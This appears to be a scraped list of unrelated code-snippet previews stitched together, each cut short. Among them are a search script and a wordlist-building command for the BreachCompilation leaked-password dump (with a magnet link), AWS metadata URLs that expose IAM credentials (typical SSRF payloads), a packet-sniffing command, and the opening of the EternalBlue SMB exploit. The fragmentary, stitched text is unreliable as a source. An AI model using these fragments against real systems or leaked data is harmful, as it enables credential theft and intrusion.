All of the following information is based on go version go1.8.3 darwin/amd64.
(Bold = supported by go out of the box, ie. without the help of a C compiler, etc.)
androiddarwin
| -----BEGIN PGP MESSAGE----- | |
| jA0ECQMC8hyc6JjPLL7/0sDkAVL4fLKAOvf6pE03gaCIUerO/PAZLWO/sf4TzdwD | |
| IbW5V5PgCkEIaQCwo4onbtBb6oLYJ9JQ6L+Hva6hW55fZOMCnWJY62vwPv6VmJNi | |
| bvgImXWFuMUT7EUREaAcUL1rbbHEz7xRSzXMH18lf5EbV7Ry0XIsmHJBOWhhp68Z | |
| 8Rq+TbEqzX2RT9a443lwQx4v527qYOoHsAjRBX8mnR3GvGJ0y/4PtGzzWoBO41I9 | |
| 9i36Tbo/dSVKw/k4deTTxacZPscPcXfebAfTlLEeS/w/WlC28O1UkZEAb+4eu5I1 | |
| clSGc0wU5v/Z3/pidTWoHUp3+/V3NeR9UZ9UWXq9JxTg8FOL+TC6sASoce8obJgy | |
| O7jd8/B00naP5U95yzgcBI3vl0phYNp7Md1CBljqz31CzKjnd1SDKAGaVcd4A/5j | |
| w0kAEHbCISoKocBWdFV2EjwCZYuzK8W6HpfyC0XfQmTJQ6xldzom1W0DkAnGlnKv |
| # version: v4.0.1 | |
| OpenCL Info: | |
| Platform ID #1 | |
| Vendor : Apple | |
| Name : Apple | |
| Version : OpenCL 1.2 (Sep 12 2017 16:28:17) | |
| Device ID #1 | |
| Type : CPU |
| \Downloads\hashcat-4.0.1>hashcat64.exe -I | |
| hashcat (v4.0.1) starting... | |
| OpenCL Info: | |
| Platform ID #1 | |
| Vendor : Intel(R) Corporation | |
| Name : Intel(R) OpenCL | |
| Version : OpenCL 1.2 |
| #!/bin/bash | |
| # query.sh from BreachCompilation - magnet:?xt=urn:btih:7ffbcd8cee06aba2ce6561688cf68ce2addca0a3 | |
| # works with older bash versions. | |
| # patch by Willem <[email protected]> | |
| dir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) | |
| if [ "$1" != "" ]; then | |
| word1=$(echo $1 | tr A-Z a-z) | |
| letter1=$(echo $word1|cut -b1) | |
| if [[ $letter1 == [a-zA-Z0-9] ]]; then |
| wordlist created from original 41G stash via: | |
| grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt | |
| Then, compressed with: | |
| 7z a breachcompilation.txt.7z breachcompilation.txt | |
| Size: |
| tcpdump -ni eth0 -X -s0 not host ${SSH_CLIENT%% *} |
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |